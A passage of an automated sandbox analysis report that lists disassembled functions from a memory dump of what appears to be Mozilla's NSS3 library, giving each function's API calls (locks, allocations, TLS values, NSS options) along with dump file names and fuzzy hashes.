                                                                                                                                                                                                                                                            • PR_WaitCondVar.NSS3 ref: 6BF189F7
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,6BEC5639,00000000), ref: 6BF18A0C
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07AD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07CD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07D6
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BE4204A), ref: 6BEB07E4
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,6BE4204A), ref: 6BEB0864
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BEB0880
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,6BE4204A), ref: 6BEB08CB
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08D7
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08FB
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
                                                                                                                                                                                                                                                            • String ID: 9Vk
                                                                                                                                                                                                                                                            • API String ID: 2759447159-4008791499
                                                                                                                                                                                                                                                            • Opcode ID: 4fa3eda3427d2c55fd7117b3aa1040e4a993805be50c6d155b671f52fbc3c353
                                                                                                                                                                                                                                                            • Instruction ID: fec838708ec1d5479c3fafa7235541ed8c39239128016a7851013649fa3cdd0d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4fa3eda3427d2c55fd7117b3aa1040e4a993805be50c6d155b671f52fbc3c353
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F32192B6908606CFDB00AF78C685569FBF4FF06318F514A69DC9897211EB34E894CBD2
                                                                                                                                                                                                                                                            Function 6BEC68E0 Relevance: 10.6, APIs: 7, Instructions: 56COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BEC68FB
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32 ref: 6BEC6913
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3 ref: 6BEC693E
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6BEC6946
                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32 ref: 6BEC6951
                                                                                                                                                                                                                                                            • free.MOZGLUE ref: 6BEC695D
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6BEC6968
                                                                                                                                                                                                                                                              • Part of subcall function 6BF6DD70: TlsGetValue.KERNEL32 ref: 6BF6DD8C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF6DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6BF6DDB4
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalSection$UnlockValue$Arena_DeleteEnterFreeLeaveUtilfree
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1628394932-0
                                                                                                                                                                                                                                                            • Opcode ID: 73b17d3a48a1835671b7498af4118228a76546e56783c10a018f3673960c372c
                                                                                                                                                                                                                                                            • Instruction ID: 3bc0d0580631d619ab69e415273775318c1a088ad0794bb4b899df63fa633985
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 73b17d3a48a1835671b7498af4118228a76546e56783c10a018f3673960c372c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E115BB55047058FDB00BFB8C18953EBBF4FF06748F154568D8A89B201EB34D894CB92
                                                                                                                                                                                                                                                            Function 6BFD5A30 Relevance: 10.6, APIs: 7, Instructions: 55stringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • malloc.MOZGLUE(0000000C), ref: 6BFD5A46
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BFD5A5F
                                                                                                                                                                                                                                                            • malloc.MOZGLUE(00000001), ref: 6BFD5A69
                                                                                                                                                                                                                                                            • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6BFD5A7F
                                                                                                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6BFD5A92
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB0F00: PR_GetPageSize.NSS3(6BEB0936,FFFFE8AE,?,6BE416B7,00000000,?,6BEB0936,00000000,?,6BE4204A), ref: 6BEB0F1B
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB0F00: PR_NewLogModule.NSS3(clock,6BEB0936,FFFFE8AE,?,6BE416B7,00000000,?,6BEB0936,00000000,?,6BE4204A), ref: 6BEB0F25
                                                                                                                                                                                                                                                            • PR_Free.NSS3(00000000), ref: 6BFD5AA9
                                                                                                                                                                                                                                                            • PR_Free.NSS3(00000000), ref: 6BFD5AB2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Freemalloc$LockModulePageSizestrcpystrlen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1933067396-0
                                                                                                                                                                                                                                                            • Opcode ID: f269565168824419c66f60a561d2b0bb19973530f5426fe90f3cc0868555df09
                                                                                                                                                                                                                                                            • Instruction ID: e27d2946d131af17e0480967abd2737b8871d9eb8f0ffe71ab3e592f49d5b8bb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f269565168824419c66f60a561d2b0bb19973530f5426fe90f3cc0868555df09
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A0171B3A002136BFB015BB59C86B17F7A8EB41698F584032EA19C6211FF3DD424C7E2
                                                                                                                                                                                                                                                            Function 6BFDCBE0 Relevance: 10.5, APIs: 7, Instructions: 46COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • calloc.MOZGLUE(00000001,00000010), ref: 6BFDCBEA
                                                                                                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6BFDCBF9
                                                                                                                                                                                                                                                              • Part of subcall function 6BF898D0: calloc.MOZGLUE(00000001,00000084,6BEB0936,00000001,?,6BEB102C), ref: 6BF898E5
                                                                                                                                                                                                                                                            • PR_NewCondVar.NSS3(00000000), ref: 6BFDCC05
                                                                                                                                                                                                                                                              • Part of subcall function 6BEABB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6BEB21BC), ref: 6BEABB8C
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BFDCC1C
                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(-0000001C), ref: 6BFDCC34
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BFDCC41
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BFDCC47
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: callocfree$CondCriticalDeleteLockSection
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 687540378-0
                                                                                                                                                                                                                                                            • Opcode ID: 1f7f2216aec1aeab4b32d964d7dda932efa51c37c24e9afa0c58ef736e61d928
                                                                                                                                                                                                                                                            • Instruction ID: f642f98d49d78f665e48f0eb6de11a1ac734132070868cf5ac7d2f00d4daf545
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f7f2216aec1aeab4b32d964d7dda932efa51c37c24e9afa0c58ef736e61d928
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4CF0FC737002015BE7006BB99C46A5BB6ACDF457EDF880434EE49C3741EE29D410C7B6
                                                                                                                                                                                                                                                            Function 6BFDC9B0 Relevance: 10.5, APIs: 7, Instructions: 45COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(00000000,6BF51AB6,00000000,?,?,6BF507B9,?), ref: 6BFDC9C6
                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,6BF507B9,?), ref: 6BFDC9D3
                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(00000000,00000001), ref: 6BFDC9E5
                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6BFDC9EC
                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(00000080), ref: 6BFDC9F8
                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6BFDC9FF
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BFDCA0B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: free$CriticalDeleteSection
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 682657753-0
                                                                                                                                                                                                                                                            • Opcode ID: 0ab4d032e46a9214c97447f6d9a4cd47c1a37d0f6830d6cf5083f3b50affa7c7
                                                                                                                                                                                                                                                            • Instruction ID: b957c576f2204fd0252c4c55177864ac230f6330ee0f4128b2cf99a2129c122e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ab4d032e46a9214c97447f6d9a4cd47c1a37d0f6830d6cf5083f3b50affa7c7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E4014FB2640605ABDB01EFB4DC89857B7FCFE496657040535E906C3A00DB35F555CBE1
                                                                                                                                                                                                                                                            Function 6BF1A970 Relevance: 9.3, APIs: 6, Instructions: 251COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 76a62b05f81bfd03a3a2af2380dc9da0e2bd5cbd204b856d6e180fac1fcffa5c
                                                                                                                                                                                                                                                            • Instruction ID: 36708b23abd857a1e27a3e6165a48d4daa8927379a5716bb0dbd7150d5e6f943
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76a62b05f81bfd03a3a2af2380dc9da0e2bd5cbd204b856d6e180fac1fcffa5c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3911D33D0C5688BCB25CE2888D13DAB7F69F4A314F4548E9C5B99B221D6398DCD8F91
                                                                                                                                                                                                                                                            Function 6BFDB9B0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89890: TlsGetValue.KERNEL32(?,?,?,6BF897EB), ref: 6BF8989E
                                                                                                                                                                                                                                                            • PR_Abort.NSS3 ref: 6BFDBA2E
                                                                                                                                                                                                                                                              • Part of subcall function 6BFD0EB0: PR_LogPrint.NSS3(Aborting,?,6BEB2357), ref: 6BFD0EB8
                                                                                                                                                                                                                                                              • Part of subcall function 6BFD0EB0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6BEB2357), ref: 6BFD0EC0
                                                                                                                                                                                                                                                              • Part of subcall function 6BFD0EB0: PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6BFD0EE6
                                                                                                                                                                                                                                                              • Part of subcall function 6BFD0EB0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6BFD0EFA
                                                                                                                                                                                                                                                              • Part of subcall function 6BFD0EB0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BFD0F16
                                                                                                                                                                                                                                                              • Part of subcall function 6BFD0EB0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BFD0F1C
                                                                                                                                                                                                                                                              • Part of subcall function 6BFD0EB0: DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BFD0F25
                                                                                                                                                                                                                                                              • Part of subcall function 6BFD0EB0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BFD0F2B
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6BFDB9CE
                                                                                                                                                                                                                                                              • Part of subcall function 6BFD5820: SuspendThread.KERNEL32(?,?,6BFDBA59,6C020478), ref: 6BFD582C
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Print__acrt_iob_funcabort$AbortBreakCriticalDebugEnterSectionSuspendThreadValuefflush
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3718378345-0
                                                                                                                                                                                                                                                            • Opcode ID: 9105f4d3e1bb7a529ed78178a6edd09e27bbfab2433cf8e7db3bde216841eb79
                                                                                                                                                                                                                                                            • Instruction ID: edc24bd43ab775df3405a94d3b614194c3efe9b7c2e14ab65ee220bce280e1df
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9105f4d3e1bb7a529ed78178a6edd09e27bbfab2433cf8e7db3bde216841eb79
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B41D273A083838BCB00AF78D4C574AF7A2BB02329F9D0A95D90557973DB3DA855C792
                                                                                                                                                                                                                                                            Function 6BF58AF0 Relevance: 9.1, APIs: 6, Instructions: 120COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(00000159,00000000,00000000,?,?,6BF46F38), ref: 6BF58B0B
                                                                                                                                                                                                                                                            • NSS_OptionGet.NSS3(00000008,?), ref: 6BF58B58
                                                                                                                                                                                                                                                            • NSS_OptionGet.NSS3(00000009,?), ref: 6BF58B6A
                                                                                                                                                                                                                                                            • NSS_GetAlgorithmPolicy.NSS3(00000159,00000000,?,?,00000000,?,?,6BF46F38), ref: 6BF58BBB
                                                                                                                                                                                                                                                            • NSS_OptionGet.NSS3(0000000A,?), ref: 6BF58C08
                                                                                                                                                                                                                                                            • NSS_OptionGet.NSS3(0000000B,?), ref: 6BF58C1A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Option$AlgorithmPolicy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 927613807-0
                                                                                                                                                                                                                                                            • Opcode ID: 66149c4950ebbe54cba64aff9718e4efae8fa80a6865c1501e8ce537c623ff4b
                                                                                                                                                                                                                                                            • Instruction ID: 778e07dcec826bd3a42ad2ec624a6b165ea3768085c4bb774efdc5671dc83599
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66149c4950ebbe54cba64aff9718e4efae8fa80a6865c1501e8ce537c623ff4b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D414773B16205A7FF019AB8CCA13AE37BADB61308F504424CD8AD71E0E76C9A558792
                                                                                                                                                                                                                                                            Function 6BF1F9A0 Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(?,00000000,-00000002,?,-00000002,?,6BEBF379,?,00000000,-00000002), ref: 6BF1F9B7
                                                                                                                                                                                                                                                              • Part of subcall function 6BF214C0: TlsGetValue.KERNEL32 ref: 6BF214E0
                                                                                                                                                                                                                                                              • Part of subcall function 6BF214C0: EnterCriticalSection.KERNEL32 ref: 6BF214F5
                                                                                                                                                                                                                                                              • Part of subcall function 6BF214C0: PR_Unlock.NSS3 ref: 6BF2150D
                                                                                                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(0000000C,00000000,-00000002,?,-00000002,?,6BEBF379,?,00000000,-00000002), ref: 6BF1F9E1
                                                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(?,00000000,-00000002,?,-00000002,?,6BEBF379,?,00000000,-00000002), ref: 6BF1FA01
                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6BF1FA1F
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6BF1FA2D
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6BF1FA4F
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$Alloc_$Arena$CriticalEnterMark_SectionUnlockValuefree
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1549345101-0
                                                                                                                                                                                                                                                            • Opcode ID: 4573737f2c73ac6b787dfa334c568473b74340ec749640122cc4a1be43d58ae9
                                                                                                                                                                                                                                                            • Instruction ID: 0ded0fb196cba98441b699834094e772735b495be90273e92db9a56988f93085
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4573737f2c73ac6b787dfa334c568473b74340ec749640122cc4a1be43d58ae9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC3185B3F193129BE7408E6A9891A17BBE46B48A84B08C979DC19DB211E77DD90087D1
                                                                                                                                                                                                                                                            Function 6BF31B60 Relevance: 9.1, APIs: 6, Instructions: 106memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800,6BF339EC,?,00000000), ref: 6BF31B87
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6BF339EC,?,00000000), ref: 6BF31B9C
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,6BF339EC,?,00000000), ref: 6BF31BCE
                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6BF339EC,?,00000000), ref: 6BF31BE8
                                                                                                                                                                                                                                                            • SECOID_FindOIDTag_Util.NSS3(6BF339EC,?,?,?,?,?,?,?,?,6BF339EC,?,00000000), ref: 6BF31C20
                                                                                                                                                                                                                                                            Memory Dump Source
